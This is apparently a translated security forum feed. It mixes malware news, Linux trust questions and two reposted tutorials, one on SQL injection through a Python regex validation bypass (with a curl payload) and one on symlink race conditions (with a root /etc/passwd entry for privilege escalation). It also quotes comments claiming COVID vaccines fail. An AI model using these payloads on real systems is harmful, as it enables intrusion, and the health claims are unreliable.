All Activity

  1. Today
  2. Hossein Jazi and Malwarebytes' Threat Intelligence team released a report on Thursday highlighting a new threat actor potentially targeting Russian and pro-Russian individuals. The attackers included a manifesto about Crimea, indicating the attack may have been politically motivated. The attacks feature a suspicious document named "Manifest.docx" that downloads and executes two attack vectors at once: remote template injection and CVE-2021-26411, an Internet Explorer exploit. Jazi attributed the attack to the ongoing conflict between Russia and Ukraine, part of which centers on Crimea, and the report notes that cyberattacks on both sides have been increasing. Jazi does note, however, that the manifesto and Crimea material may be a false flag planted by the threat actors. Malwarebytes' Threat Intelligence team discovered "Манифест.docx" ("Manifest.docx") on July 21, finding that it downloads and executes two templates: one is macro-enabled and the other is an HTML object containing the Internet Explorer exploit. The analysts found that the exploitation of CVE-2021-26411 resembled an attack launched by the Lazarus APT. According to the report, the attackers combined social engineering with the exploit in order to increase their chances of infecting victims. Malwarebytes was not able to attribute the attack to a specific actor, but said that a decoy document displayed to victims contained a statement from a group associated with a figure named Andrey Sergeevich Portyko, who allegedly opposes Russian President Vladimir Putin's policies on the Crimean Peninsula. Jazi explained that the decoy document is loaded after the remote templates; it is in Russian but is also translated into English. 
The attack also features a VBA RAT that collects victim information, identifies the antivirus product running on the victim's machine, executes shellcode, deletes files, uploads and downloads files, and reads disk and file-system information. Jazi noted that instead of using well-known API calls for shellcode execution, which are easily flagged by AV products, the threat actor used the less common EnumWindows API to execute its shellcode. Via zdnet.com
  3. Yesterday
  4. Last week
  5. This also applies to Doctor Fauci, per the comments: James 2 hours ago So he basically says the vaccine doesn't work for the delta variant, but the blame is on the people who won't get the vaccine (which doesn't work). He must think we're complete idiots at this point. marcus 19 minutes ago You have to take into account that there are literally brain-dead sick people everywhere who still worship and follow this crap. Coming soon to Romanistan: the CDC again recommends wearing masks indoors, even for the vaccinated. US states without mask mandates had fewer Covid cases than those with them. Fauci's contradictions. BOMBSHELL: the CDC is dropping the RT-PCR diagnostic method. An exceptional editorial by Tucker Carlson of Fox News
  6. I can't believe it... wtf... :( thanks. Edit: solved
  7. See the news section. PS: good thing you didn't leave your address
  8. Hi, what could cause the error "An error 500 occurred on server" when I check this address? https://www.blockchain.com/btc/address/bc1qq9tk3uhcx58y5qvmzs50nhs49m0pdkmrfpkzs4
  9. Some additional details wouldn't hurt, either publicly or in private. Program name, vendor, download link if it (still) exists, etc. Software licensing is, in general, a sensitive matter for software developers. Some use technologies made by others to license their own products, and some rely on their own ingenuity/creativity. A lot depends on whether the purchased license is (or was) tied to a specific hardware platform (hardware ID, HDD serial ...), whether it expects a response from an online server, and so on. There are so many licensing schemes that without further details I don't think we can come up with the saving solution. A solution which may exist ... or not.
  10. There isn't much you can do if the program's functionality doesn't allow activating the license. You can try setting the clock back a few years, but the odds of that working are slim (you set it back afterwards). Wouldn't a newer version of the program do the job? Maybe you can talk to the vendor about issuing you a new one
  11. 8DAF2JRHC U23W5P9IO IUE44GN3D 41MW71AC3 YL6UZRW51 J0O5RAGH7 QRVL118JU HTTP bandwidth usage stats
  12. used HHRLE5O6Y, other new ones here HDTWTTEWS DMRDLEQ9Z G0B5JFA2S 3P69SNBTG 5X19KVFFX IHNIK916I 3SZ1SB8OH
  13. https://www.debian.org/CD/verify Most distros come with signed checksums. You download the files, compute their hash (locally, on your PC) and check whether the computed hash matches the official one, signed by the author. That way you know 100% that what you downloaded is the official version, without modifications by third parties. Whether or not you trust the authors is a much more complicated problem. Some distros have public source code, independent security audits, and are used by large companies in safety-critical situations. All of these inspire confidence, but you can never be 100% sure. There could be a Remote Code Execution bug in the UNIX kernel. There could be an exploit in the network card's hardware. At the extreme: can you trust your "process monitor" or "firewall"? Maybe they themselves are infected! In short: nobody is going to steal the $10 from sports betting or forex that you're putting into crypto auto-trading. You cash it out quickly through an offshore account and put it into the dental practice. I'd bet your bot will lose your money in margin trades. Good luck!
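The verification flow described above can be sketched in Python. This is a minimal illustration using only the standard library; the function names are mine, and the official checksum would come from the distro's signed file (e.g. Debian's SHA256SUMS), whose PGP signature you would verify separately with gpg:

    import hashlib

    def sha256_of_file(path, chunk_size=1 << 20):
        """Compute the SHA-256 hash of a file locally, reading in chunks."""
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(chunk_size), b""):
                h.update(chunk)
        return h.hexdigest()

    def verify_download(path, official_hex):
        """Compare the locally computed hash against the official (signed) one."""
        return sha256_of_file(path) == official_hex.lower().strip()

A matching hash only proves integrity; it proves authenticity only after you have checked the signature on the checksum file itself.

```python
import hashlib

def sha256_of_file(path, chunk_size=1 << 20):
    """Compute the SHA-256 hash of a file locally, reading in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_download(path, official_hex):
    """Compare the locally computed hash against the official (signed) one."""
    return sha256_of_file(path) == official_hex.lower().strip()
```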
  14. I saw on Youtube that under normal use it needs at most 95-100 MB of RAM and doesn't take up much disk space either, and I figured it would be perfect for a micro/portable/pocket PC that you leave running somewhere on top of the wardrobe and forget about. There are others too, but from what I see in the Youtube tests they freeze and don't run as smoothly as this one. I don't mean a backdoor from government agencies, but rather that some installed package or some .so library might contain malware code planted by the very people who make it, in this case the people running that site. But isn't there some kind of process monitor to see what each running process does and which files it accesses/deletes/creates/downloads at runtime? Likewise, isn't there some kind of firewall that checks exactly which file is trying to reach which host? And isn't there a good antivirus for Linux that you can rely on? Thanks a lot!
  15. If you want to run some crypto bot, I don't think you need to worry that the NSA has planted a backdoor there; they won't care unless you're someone globally important (e.g. the director of a nuclear plant in Iran). Securing it is fairly simple: 1. Update as often as possible 2. Don't install every piece of junk 3. Remove things you don't need, such as services you don't use 4. Leave only SSH, key-based auth, and you're done 5. You can do a lot of hardening, but you don't really need to. If you want, you can verify a Linux distribution and be certain it has no backdoor, except it will take a few thousand years: 1. Take all the source code and compile it 2. Do a reproducible build if possible; if not, diff what's on your distribution against what you compiled 3. Check all the differences (there will be some) caused by patches, modifications or configuration 4. Audit all the source code, from the kernel to every installed program, and make sure there's no backdoor 5. Bonus: hunt for vulnerabilities while you're at it. Now seriously, there isn't much you can do as a single individual. If a few thousand people got together it could be done, but it would still take months or even years (with no updates happening in the meantime). As for that distribution, I haven't heard of it; why did you choose it? Why not something "classic": debian, centos, ubuntu, kali etc.?
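Step 2 of the verification list above (diffing what's on your system against what you compiled) can be sketched as a toy file-level comparison. This is only an illustration of the idea, not a real reproducible-build tool; both function names are mine:

    import hashlib
    import os

    def tree_hashes(root):
        """Map each file's path (relative to root) to its SHA-256 digest."""
        hashes = {}
        for dirpath, _, filenames in os.walk(root):
            for name in filenames:
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root)
                with open(full, "rb") as f:
                    hashes[rel] = hashlib.sha256(f.read()).hexdigest()
        return hashes

    def diff_trees(installed_root, rebuilt_root):
        """Return relative paths whose content differs or exists on one side only."""
        a, b = tree_hashes(installed_root), tree_hashes(rebuilt_root)
        return sorted(p for p in a.keys() | b.keys() if a.get(p) != b.get(p))

Every path this returns is a difference you would then have to explain by a patch, a build timestamp, or something worse.

```python
import hashlib
import os

def tree_hashes(root):
    """Map each file's path (relative to root) to its SHA-256 digest."""
    hashes = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            with open(full, "rb") as f:
                hashes[rel] = hashlib.sha256(f.read()).hexdigest()
    return hashes

def diff_trees(installed_root, rebuilt_root):
    """Return relative paths whose content differs or exists on one side only."""
    a, b = tree_hashes(installed_root), tree_hashes(rebuilt_root)
    return sorted(p for p in a.keys() | b.keys() if a.get(p) != b.get(p))
```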
  16. Say you've installed a Linux distribution on your PC. How can you know/verify whether it has backdoors, spyware or password stealers preinstalled, or is somehow made to download them shortly after you've installed the operating system on the hard disk? Assume, for the sake of discussion, that you want to run a crypto trading bot nonstop, for example (someone has already posted one of that kind on the forum), and it only runs on Linux. What do you do? How do you check whether something is wrong, and how do you secure it? These may sound like paranoid questions, but let's not forget that at one point the source code of a torrent client contained bitcoin-mining code and they admitted it later, so anything is possible. Also, somewhat related, what do you think of this Linux distribution? https://puppylinux.com/ Is it trustworthy?
  17. I'd like to ask whether anyone can help me with a setting in a program, because my purchased license no longer works and the vendor no longer offers support since it's far too old. This is about configuring the old license, by no means about cracking any program. Thanks
  18. Because it's not your money; if you don't have the digital signature (PGP), you can kiss it goodbye
  19. Registry Explorer
Replacement for the Windows built-in Regedit.exe tool. Improvements over that tool include:
- Show real Registry (not just the standard one)
- Sort list view by any column
- Key icons for hives, inaccessible keys, and links
- Key details: last write time and number of keys/values
- Displays MUI and REG_EXPAND_SZ expanded values
- Full search (Find All / Ctrl+Shift+F)
- Enhanced hex editor for binary values
- Undo/redo
- Copy/paste of keys/values
- Optionally replace RegEdit
- more to come!
Build instructions: build the solution file with Visual Studio 2022 preview. It can be built with Visual Studio 2019 as well (change the toolset to v142). Source: https://github.com/zodiacon/RegExp
  20. A Python Regular Expression Bypass Technique
One of the most common ways to check a user's input is to test it against a regular expression. The Python module re provides easy and very powerful functions to check whether a particular string matches a given regular expression (or whether a given regular expression matches a particular string, which comes down to the same thing). Sometimes the functions in Python's re module are misused or not well understood by developers, and when you see this it can be possible to bypass weak input validation functions. TL;DR: using Python's re.match() function to validate user input can lead to a bypass, because it will only match at the beginning of the string and not at the beginning of each line. So, by converting a payload to multiline, the second line will be ignored by the function. This means that a weak validation function that blocks special characters in a value (for example id=123) could be bypassed with something like id=123\n'+OR+1=1--. In this article I'll show you an example of bad usage of the re.match() function. [from search() vs. match()] Python offers two different primitive operations based on regular expressions: re.match() checks for a match only at the beginning of the string, while re.search() checks for a match anywhere in the string (this is what Perl does by default). For example:

    >>> re.match("c", "abcdef")    # No match
    >>> re.search("c", "abcdef")   # Match
    <re.Match object; span=(2, 3), match='c'>

Regular expressions beginning with '^' can be used with search() to restrict the match to the beginning of the string:

    >>> re.match("c", "abcdef")    # No match
    >>> re.search("^c", "abcdef")  # No match
    >>> re.search("^a", "abcdef")  # Match
    <re.Match object; span=(0, 1), match='a'>

As you can see, the first re.match() didn't match because of its implicit start-of-string anchor. Anchors do not match any character at all. Instead, they match a position before, after, or between characters. 
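The quoted behaviour is easy to confirm directly from a Python shell; the snippet below just re-runs the article's examples as assertions:

    import re

    # re.match() is implicitly anchored at the start of the string,
    # so the "c" at index 2 is never found:
    assert re.match("c", "abcdef") is None

    # re.search() scans the whole string and finds "c" at index 2:
    assert re.search("c", "abcdef").span() == (2, 3)

    # With an explicit '^', search() is restricted to the start too:
    assert re.search("^c", "abcdef") is None
    assert re.search("^a", "abcdef").span() == (0, 1)

```python
import re

# re.match() is implicitly anchored at the start of the string,
# so the "c" at index 2 is never found:
assert re.match("c", "abcdef") is None

# re.search() scans the whole string and finds "c" at index 2:
assert re.search("c", "abcdef").span() == (2, 3)

# With an explicit '^', search() is restricted to the start too:
assert re.search("^c", "abcdef") is None
assert re.search("^a", "abcdef").span() == (0, 1)
```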
They can be used to "anchor" the regex match at a certain position (https://www.regular-expressions.info/anchors.html).
Input Validation using re.match()
Let's say I've got a Python Flask web application that is vulnerable to SQL injection. If I send an HTTP request to /news with an article id number in the id argument and a category name in the category argument, it returns the content of that article. For example:

    from flask import Flask
    from flask import request
    import re

    app = Flask(__name__)

    def is_valid_input(input):
        m = re.match(r'.*(["\';=]|select|union|from|where).*', input, re.IGNORECASE)
        if m is not None:
            return False
        return True

    @app.route('/news', methods=['GET', 'POST'])
    def news():
        if request.method == 'POST':
            if "id" in request.form:
                if "category" in request.form:
                    if is_valid_input(request.form["id"]) and is_valid_input(request.form["category"]):
                        return f"OK: {request.form['category']}/{request.form['id']}"
                    else:
                        return f"Invalid value: {request.form['category']}/{request.form['id']}", 403
                else:
                    return "No category parameter sent."
            else:
                return "No id parameter sent."

By sending a request with id=123 and category=financial, the application replies with a "200 OK" status code and "OK: financial/123" as the response body. As I said, the id argument is vulnerable to SQL injection, so the developer fixed it by creating a function that validates the user's input on both arguments (id and category) and prevents sending characters like single and double quotes or strings like "select" or "union". 
As you can see, this webapp checks the user's input with the is_valid_input function:

    def is_valid_input(input):
        m = re.match(r'.*(["\';=]|select|union|from|where).*', input, re.IGNORECASE)
        if m is not None:
            return False
        return True

The code above means: "if the value of any input contains a double quote, single quote, semicolon, or equals character, or any of the following strings: "select", "union", "from", "where", then discard it". Let's try it: by trying to inject SQL syntax into the value of the id argument, the webapp returns a 403 Forbidden status with "Invalid value" as the response body. This is thanks to the validation function, which matches invalid characters in my payload such as the single quote and equals sign.
Input Validation Bypass
From the re module documentation, about the re.match() function: "... even in MULTILINE mode, re.match() will only match at the beginning of the string and not at the beginning of each line. If you want to locate a match anywhere in string, use search() instead (see also search() vs. match())." So, to bypass this kind of input validation we just need to convert the SQL injection payload from a single line to multiline by adding a \n between the numeric value and the SQL syntax. If the question is "can SQL have a newline inside a SELECT?", the answer is: yes, it can. Let's do it on the vulnerable webapp. As shown in the original article's screenshot, I just put a \n (not CRLF, \r\n) after the id value and then started my SQL injection. The validation function only validates the first line, so I bypassed it. 
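The bypass can be reproduced against the validation function on its own, without running the Flask app; the payload is the one from the article:

    import re

    def is_valid_input(value):
        # Deny-list check from the vulnerable app: reject quotes, '=', ';'
        # and common SQL keywords anywhere '.*' can reach them.
        m = re.match(r'.*(["\';=]|select|union|from|where).*', value, re.IGNORECASE)
        if m is not None:
            return False
        return True

    # Single-line injection is caught: '.*' reaches the quote and '='.
    assert is_valid_input("123' OR 1=1--") is False

    # The multiline payload slips through: '.' does not match '\n', and
    # re.match() only tries the match at the start of the string,
    # so nothing past the newline is ever inspected.
    assert is_valid_input("123\n' OR 1=1--") is True

```python
import re

def is_valid_input(value):
    # Deny-list check from the vulnerable app: reject quotes, '=', ';'
    # and common SQL keywords anywhere '.*' can reach them.
    m = re.match(r'.*(["\';=]|select|union|from|where).*', value, re.IGNORECASE)
    if m is not None:
        return False
    return True

# Single-line injection is caught: '.*' reaches the quote and '='.
assert is_valid_input("123' OR 1=1--") is False

# The multiline payload slips through: '.' does not match '\n', and
# re.match() only tries the match at the start of the string,
# so nothing past the newline is ever inspected.
assert is_valid_input("123\n' OR 1=1--") is True
```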
Using curl:

    curl -s -d "id=123%0a'+OR+1=1--&category=test" 'http://localhost:5000/news'
    OK: test/123

Run it in your Lab
First, save the vulnerable Flask webapp source code (the app.py shown above) and then start the Flask webserver with:

    flask run

Remediation
The first option is to do positive validation instead of negative validation. Don't create a deny-list of "not allowed words" or "not allowed characters"; check for the expected value format instead. For example, id=123 can be validated by ^[0-9]+$. The second option is to use re.search() instead of re.match(), which checks the whole value and not just the first line. Third option: don't create your own input validation function, but try to find a widely used and maintained library that does it for you.
Follow
If you liked this post, follow me on twitter to keep in touch! https://twitter.com/AndreaTheMiddle Source: https://www.secjuice.com/python-re-match-bypass-technique/
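One subtlety with the positive-validation regex ^[0-9]+$ is worth noting: in Python, a trailing $ also matches just before a final newline, so re.fullmatch() (or the \Z anchor) is the stricter choice. A small sketch; the validate_id name is mine:

    import re

    def validate_id(value):
        """Accept only digit strings; fullmatch() anchors at both real ends."""
        return re.fullmatch(r"[0-9]+", value) is not None

    assert validate_id("123") is True
    # '$' alone still accepts a trailing newline; fullmatch() does not:
    assert re.match(r"^[0-9]+$", "123\n") is not None
    assert validate_id("123\n") is False
    # The article's multiline injection payload is rejected outright:
    assert validate_id("123\n' OR 1=1--") is False

```python
import re

def validate_id(value):
    """Accept only digit strings; fullmatch() anchors at both real ends."""
    return re.fullmatch(r"[0-9]+", value) is not None

assert validate_id("123") is True
# '$' alone still accepts a trailing newline; fullmatch() does not:
assert re.match(r"^[0-9]+$", "123\n") is not None
assert validate_id("123\n") is False
# The article's multiline injection payload is rejected outright:
assert validate_id("123\n' OR 1=1--") is False
```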
  21. Winning the race: Signals, symlinks, and TOC/TOU
Date: 23rd Jun 2021 | Author: uid0
Introduction: So, before we dive right into things, just a few bits of advice: some programming knowledge, an understanding of what symbolic linking is within *nix and how it works, and an understanding of how multi-threading and signal handlers work would all help readers follow the concepts I'm going to cover here. If you can't code, don't worry, as I'm sure you'll still be able to grasp the concepts, but having prior programming knowledge will give you a deeper understanding of how this actually works. It won't kill you to read up on the subjects I just mentioned, and by doing so you will find this tutorial a lot easier to follow. Ideally, if you understand C/C++ and assembly language, you should be able to pick up the concept of a practical (s/practical/exploitable) race condition bug relatively easily. Knowing your way around a debugger would also help. Not all race conditions are vulnerabilities, but many race conditions can lead to vulnerabilities. That said, when vulnerabilities do arise as a result of race condition bugs, they can be extremely serious. There have been cases in the past where race condition flaws have affected national critical infrastructure, in one case even directly contributing to the deaths of multiple people (no kidding!). Generally, within multi-threading, race conditions aren't an issue in terms of exploitability but rather in terms of the intended program flow not going as planned (note "generally": there can be exceptions where this can be used for exploitation rather than being a mere design issue). Anyway, before getting into specific kinds of race condition bugs, it should be noted that these bugs can exist in anything from a low-level Linux application to a multi-threaded relational DBMS implementation. 
In terms of paradigm, if your code is purely functional (I'm talking in terms of paradigm here, although I guess that use of terminology is interchangeable, as code that suffers from race condition flaws lacks functionality in the non-paradigm sense too) then race conditions will not occur. So, what exactly are race conditions? Let's take a moment to sit back and enter the land of imagination. For the sake of this post, let's pretend you're not a fat nerd sitting in your Mom's basement living off of beer and tendies while making sweet sweet love to your anime waifu pillow. Let's imagine, just for one moment, that you're someone else. You're not just any old someone, no. You're someone who does something important. You're a world-class athlete. You spent the last 4 years training non-stop for the 100m sprint, and you are certain you are going to win the Gold Medal this year. The time finally comes; you are ready to race. During the sprint you're neck and neck with Usain Bolt, both inches away from the finish line. By sheer chance, you both pass over the finish line at the exact same moment. The judges replay the footage in slow motion to see who crossed the finish line first, and unbelievably, you both crossed at the exact same moment, down to the very nanosecond! Now the judges have a problem. Who wins Gold? You? Usain Bolt? The runner-up who crossed the line right after you two? What if nobody wins? What if you're both given Gold, decreasing the subjective value of the medal? What if the judges call off the event entirely? What if they demand a re-match? What if a black hole suddenly spawns in the Olympic arena and causes the entire solar system to implode? Who the hell knows, right? Well, welcome to the wild and wacky world of race conditions! This is Part One of a three-part series diving into the subject of race conditions; there's absolutely no way I can cover this whole subject in three blog posts. Try three books, maybe! 
Race conditions are a colossally huge subject with a wide variety of security implications, ranging from weird behaviour that poses no risk at all, to crashing a server, to full-blown remote command execution! Due to the sheer size of this topic, I suggest doing research in your own time between reading each part of this tutorial series. While it might seem intimidating at first, this is actually a very simple concept to grasp (exploiting it, on the other hand, is a bit more hit and miss, but I'll get into that later). Race conditions stem from novice developers assuming that their code will execute in a linear fashion, or from developers implementing multi-threading in an insecure manner. If such a program then attempts to perform two or more operations at the same time, changes within the program's code flow can end with undesirable results (or desirable, depending on whether you're asking the attacker or the victim!). It should also be noted (as stated before) that race conditions aren't necessarily always a security risk; in some cases they just cause unexpected behaviour within the program flow while leading to no actual risk. Race conditions can occur in many different contexts, even within basic electronics (and biology! Race conditions have been observed within the brains of live rats). I will be covering race conditions from an exploitation standpoint, mainly within web applications or vulnerable C programs. The basic premise of a race condition bug is that two threads "race" against each other, allowing the winner of said race to manipulate the control flow of the vulnerable application. I'll touch lightly upon race conditions in multi-threaded applications and give some brief examples, but this post will mainly focus on races resulting from signal handling, faulty access checks, and symlink tricks. 
In addition to that, I'll give some examples of how this class of bugs can be abused within web applications. Race conditions cover such a broad spectrum that I simply cannot discuss all of it within one blog post, so I'll give a quick overview of the basics, which hopefully you can build upon with your own research. To give you a simpler analogy of what a race condition is, imagine you have online banking with a banking platform. Let's assume you open two separate browser tabs at once, both with the payment page loaded, and you set up both tabs so that you're ready to make a payment to another bank account. If you were to then click the button to make the payment in both tabs at identical times, it could register that only one payment had been made, when in reality the payment had been made twice but the money for only one of the payments was deducted from your bank balance. This is a very basic analogy of how a race condition could take place, although it is highly unlikely to ever happen in a real-world scenario. I'm going to demonstrate some code snippets to explain this, showing different kinds of races that are possible, with examples in various languages, but I'll start with pseudo-code (the snippet in the original post is C-inspired pseudo-code). The reason I gave the first example in C is because race conditions tend to be very common within vulnerable C applications. Specifically, you should be looking for the signal.h header, as this is generally a good indicator of a potential race condition bug being present (within issues regarding signal handling, at least). Another good indicator is the presence of access checks on files, as this can often lead to symlink races taking place (I will demonstrate this shortly). I will give other examples in other languages and explain context-specific race condition bugs associated with those languages. 
While the code above is clearly not a working example, it should allow me to illustrate the concept of race conditions. Let's assume an attacker sends two operations to the program at the same time, and the code flow states that if permitted, the specified function executes. If timed correctly, an attacker could arrange for something to be permitted at the time of check but no longer permitted at the time of use (this would be a TOC/TOU race, meaning "Time of Check / Time of Use"). So, for example, we can assume that the following test is being run: if (something_is_permitted) // check if permitted. The conditions for the if statement are met and the code flow continues in the intended order, but by the time the function is actually called, the condition that was checked may no longer hold; the program nevertheless executes the following code: doThis(); This results in unintended program flow, and depending on the nature of the code it could allow an attacker to bypass access controls, escalate privileges, cause a denial of service, etc. The impact of race condition bugs can vary greatly, ranging from a petty nuisance to critical exploits resulting in the likes of remote root. I'll begin by describing various types of race conditions and methods of triggering them, before moving on to some real-world examples of race conditions and an explanation of how they can be tested for within potentially vulnerable web applications. When most people think of race conditions, they imagine them to be something very fast-paced, and expect the timing required to execute a TOC/TOU race to be extremely precise. While this is often the case, it is not always the case. 
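The check-then-use gap described above can be made concrete in a few lines of deliberately vulnerable Python; in the article's C examples, the same window sits between the access() call and fopen(). The function names here are mine:

    import os

    def check(path):
        # Time of check: is this path writable right now?
        return os.access(path, os.W_OK)

    def use(path, data):
        # Time of use: by now, `path` may resolve somewhere entirely different.
        with open(path, "w") as f:
            f.write(data)

    def vulnerable_write(path, data):
        if check(path):
            # <-- the race window: an attacker who swaps `path` for a symlink
            #     here gets the write redirected to the symlink's target
            use(path, data)
            return True
        return False

An attacker who wins the race replaces `path` with a symlink to a privileged file between check() and use(); the safe pattern is to drop the separate check entirely and open the file with flags such as O_NOFOLLOW.

```python
import os

def check(path):
    # Time of check: is this path writable right now?
    return os.access(path, os.W_OK)

def use(path, data):
    # Time of use: by now, `path` may resolve somewhere entirely different.
    with open(path, "w") as f:
        f.write(data)

def vulnerable_write(path, data):
    if check(path):
        # <-- the race window: an attacker who swaps `path` for a symlink
        #     here gets the write redirected to the symlink's target
        use(path, data)
        return True
    return False
```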
Consider the following example of a "slow-paced" race condition bug:
- There exists a social-networking application where users have the ability to edit their profile
- A user clicks the "edit profile" button, which opens the webpage allowing them to make edits
- The user then goes AFK (away from keyboard)
- The administrator finds an unrelated vulnerability in the profile-editing section of the website and, as a result, locks down the edit functionality so that users can no longer edit their profiles
- The user returns, still having the profile-editing page open in a browser tab
- Despite new users not being able to access the "edit profile" page, this user already has the page open and can continue to make edits despite the restriction put in place by the administrator
Race conditions can also take place as a result of latency within networks. Take an IRC network, for example: let's assume there is a hub and two linked nodes. Bob wants to register the channel #hax, yet Alice also wants to register this same channel. Consider the following:
- Bob connects to IRC from node #1
- Alice connects to IRC from node #2
- Bob runs /join #hax
- Alice runs /join #hax
- Both of these commands are run from separate nodes at around the same time
- Bob becomes an operator of #hax
- Alice becomes an operator of #hax
The reason for this is that, due to network latency, node #1 would not have time to signal node #2 that the services daemon had already assigned operator status to another user on the same network. (PROTIP: When testing local desktop applications for race conditions - for example a compiled binary - use something like GDB or OllyDbg to set a breakpoint between TOC and TOU within the binary you are debugging. Execute your code from the breakpoint and take note of the results in order to determine any potential security risk, or lack thereof. This is for confirmation of the bug only, and not for actual exploitation. As the saying goes, PoC||GTFO. 
This rings especially true with race conditions, considering some of them are just bugs or glitches or whatever you want to call them, as opposed to viable exploits with real attack value. If you cannot demonstrate impact, you probably should not report it.)
Symlinks and flawed access checks: Using symlinks to trigger race conditions is a relatively common method, and here I will give a working example of it. The example shows how a symlink race can be used to exploit a badly implemented access check in C/C++, which would allow an attacker to escalate privileges in order to get root on a server (assuming the server ran a program that was vulnerable in this manner). It should be noted that while writing to /etc/passwd in the manner I'm about to demonstrate will not work on newer operating systems, these methods can still be used to obtain read (or sometimes write) permissions on root-owned files that generally would not be accessible from a regular user account. This method assumes that the program in question is run with setuid access rights. The intended purpose of the program is to check whether you have permission to write to a specific directory (via an access() check); if you have permission, it writes your user input to the directory of choice. If you don't have permission, the access() check is intended to fail, indicating that you're attempting to write to a directory or file you lack the permissions to write to. For example, the /tmp directory is world-writeable, whereas a directory such as /etc requires additional permissions. The goal of an attacker here is to abuse symbolic linking to trick the program into thinking it is writing to /tmp, where it has permission, when in fact it is writing to /etc, where it lacks permission. In modern Linux distributions (and in modern countermeasures implemented in languages such as C), there are ways of attempting to mitigate such an attack. 
For example, the POSIX C standard library provides the mkstemp() function, as opposed to fopen() or fwrite() on a predictable filename, in order to create temporary files safely, and mktemp(1) likewise allows creation of temporary files within *nix-based systems. Another attempt at mitigating this in *nix-based systems is the O_NOFOLLOW flag for open() calls; the purpose of this flag is to prevent files from being opened through a symbolic link. Take a look at the vulnerable code in the original post (this is a race condition between the original program and a malicious one which will be used): an example suid program vulnerable to a typical TOC/TOU symlink race condition through an insufficient access check. I will be compiling and running this from my (non-root) user account. First, I will demonstrate this using a debugger (GDB, although others such as OllyDbg will suffice too), because it allows you to pause the execution of the program, letting the race condition take place more easily; in a real exploitation scenario you would need to trigger the race condition naturally, which I will demonstrate next. First, disassemble the code using your debugger of choice. Now, set a breakpoint at fopen() so we can demonstrate a race condition without actually having to go through the steps of triggering one naturally: break *0x80485ca Then replace the written file with a symbolic link. Now that you've paused the execution of the program flow through use of a breakpoint, resuming the program flow (after the symlink has been made) causes the access check to be passed, meaning the program continues to run as intended and writes the input to a file that the user should not have been able to write to. 
Of course, using GDB or another debugger isn't possible in real-world scenarios, therefore it is necessary to implement something that will allow the race condition to take place naturally (instead of setting a breakpoint and pausing the program execution with a debugger to get the timing right). One way of doing this is by repeatedly performing two operations at the same time, until the race condition is met. The following example will show how the access check in the vulnerable C program can be bypassed as a result of two bash scripts running simultaneously. Once the race condition is successfully met, the access check will be passed and a new entry will be written to /etc/passwd.

Script #1: This script should run repeatedly until the condition is met; that's why it re-executes itself within the while loop.

Script #2: This script will repeatedly attempt to make a symbolic link to /etc/passwd.

After a while of both of these scripts running at the same time, the timing should eventually line up so that the symbolic link is made after the access check passes but before the write completes, causing the access check to be bypassed and data to be written to a previously restricted file (/etc/passwd in this case). If all goes to plan, an attacker should be able to write a new entry to /etc/passwd with root privs:

raceme:2PYyGlrrmNx5.:0:0::/root:/bin/sh

From here, they can simply use 'su' to authenticate as a root user with the new 'raceme' account they have created by adding an entry to /etc/passwd. g0t r00t!!

Race Conditions within Signal Handling:

If you do not understand the concept of signal handlers within programming, now is probably a good time to become familiar with the subject, as it is one of the primary causes of race condition flaws.
The most common occurrence of race conditions within signal handlers is when the same function is installed as the handler for multiple different signals, and those different signals invoke the shared handling function within a short time-frame of each other (hence the race condition). "Non-reentrant" signal handlers are the primary culprit that makes signal-based races an issue. If you're unfamiliar with the concept of non-reentrancy within signal handling, then I really do suggest reading into the topic in-depth, but if you're like me and have a TL;DR attitude and just wanna go hack the planet already, then I will offer a short and sweet explanation (the terminology alone is somewhat self-explanatory, in all honesty): if a function has been installed with signal handling operations in mind, and that function either maintains an internal state or calls another function that maintains an internal state, then it's a non-reentrant function, and this means there is a higher probability of a race condition being possible. For an example demonstrating the exploitability of race condition bugs associated with signal handlers, I will be using the free(); function (associated with dynamic memory allocation in C/C++) to trigger a traditional and well-known application-security flaw referred to as a "double free". The following code example shows how an attacker could craft a specifically timed payload. If you're not spotting the common trend here, race conditions are all about timing. Generally attackers will have their payloads running concurrently in a for/while loop, or they'll create a ghetto-style "loop" of sorts by having payload1.sh repeatedly execute payload2.sh, which in turn will repeatedly execute payload1.sh, and so on.
The reasoning for this is that in many contexts, for a race condition to be successful, the requests need to be made concurrently, sometimes even down to the exact millisecond. Rather than executing their payload once and hoping for the one-in-a-million chance of getting the timing exactly right, it makes far more sense to use a loop to repeatedly execute the payload, as each iteration of the loop gives the attacker another chance of getting the timing right. Pair this with methods of slowing down the execution of certain processes, and the attacker has increased their window (the "window" here being the viable time in which the race condition can occur, allowing the attack to be carried out). For example, with a TOC/TOU race, the "attack window" is the time between the check taking place ("TOC", Time of Check) and the moment the action occurs ("TOU", Time of Use), before the check is carried out again. In other words, the attack window is the time frame during which the most recent check still says the action is permitted; for a very short period it is, up until the iteration wherein the next check occurs, at which point the action is no longer permitted and the window has closed. In practice, winning a race comes down to:

- maximising the window in which the attack can be carried out by slowing down particular aspects of program/process execution (I cover methods of doing this in a chapter here)
- making as many concurrent attempts at triggering the race within the time-frame dictated by the length of your attack window. Use multiple threads where possible.
- Testing manually with a debugger by setting a breakpoint between TOC and TOU
- Having lots of processing power available to make as many concurrent requests as possible during your attack window (while using the methods I describe to slow down other elements of process execution at the same time)

Below you can find an example of a race condition present via signal handling, with the triggering of a double free as a proof-of-concept. This code example uses a single signal handler function which is non-reentrant and makes use of shared state. The handler in question calls the free(); function, and in this example an attacker could send two different signals to the same signal handler at (nearly) the same time, resulting in memory corruption as a direct result of the race condition itself. If you have experience with C/C++ and dynamic memory allocation, then you're probably aware of the issues posed by calling free(); twice with the same argument. For those who are not, this is known as a "double free bug", and it results in the program's memory structures becoming corrupted, which can cause a multitude of problems ranging from segfaults and crashes to arbitrary code execution, as a result of the attacker being able to control the data written into a memory region that the allocator has handed out twice, resulting in a buffer overflow taking place. And while the RCE is triggered by the overflow, which in turn is triggered by the double free, the double free itself is triggered as a result of a race condition occurring due to two separate signals being sent to the same free();-calling signal handler, which, without getting overly technical, essentially makes malloc(); throw a hissy-fit and poop its pants.
The following code demonstrates this issue (tidied up so it compiles; the non-reentrant handler vuln() is installed for two different signals):

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
